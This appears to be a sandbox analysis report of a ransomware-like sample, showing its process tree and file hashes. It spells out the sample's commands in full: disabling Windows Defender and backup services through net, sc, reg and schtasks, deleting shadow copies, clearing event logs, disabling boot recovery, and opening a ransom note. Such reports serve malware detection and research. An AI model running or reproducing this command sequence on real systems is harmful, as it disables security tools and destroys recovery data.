4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 1736 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 1736 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 2040 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 2040 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 2040 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 1304 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 1304 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 1304 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 1744 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:776
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:992
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1196
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:408
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1432
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1876
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1916
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1624
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:864
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1892
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1736
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:2040
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1304
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1744
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:920
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1592
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:752
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1716
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:776
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:904
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1764
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1772
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:636
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1432
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:800
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:968
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1180
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1948
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1700
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1392
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1504
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1412
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1156
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1548
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:676
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:688
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1964
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1256
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1528
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:964
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1624
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1116
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:832
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1740
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1944
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1588
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1224
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:408 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:916
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1768 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1120 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1136 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1208 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1836 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1756 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1696 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:936 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1028
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:320 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1580
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1904 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2104
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2124 -
C:\Windows\system32\notepad.exenotepad.exe C:\wPfq_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2504 -
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe"2⤵PID:2512
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2536
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5f48421645e65afafe8ff3a051e18ee81
SHA10be58da0cdd48862918da5a8130e1badea773bc8
SHA256e255771c63499b3941fdb19d178bcd797a41fb3d8718e8a54aa8db9c381d3f7c
SHA51217275cd960d7351f237ea8451cece942c3b3b384b995aaa950692f579a677ffc6128c21b4f616cd53a5e2f5ffd418815c59a2da251daeff25a26ca52f1ad0baa
-
MD5
3d3aab4fac96343c7e4bf9f111f89193
SHA1550d2ea76bb0a789e4bfbefef4a899c4fbad254c
SHA25654643189ee659f0e200ac4eb1ae678f35c016e0905eca63e675dbeadfc2422d8
SHA51215b065276f0f8acd76c54462a6f71153e0df65a10aff76412bf2582940b46ff64124e2577e320220aa9c0daf1e4d3f5fc5d4d78aee5979e60a10690a702badda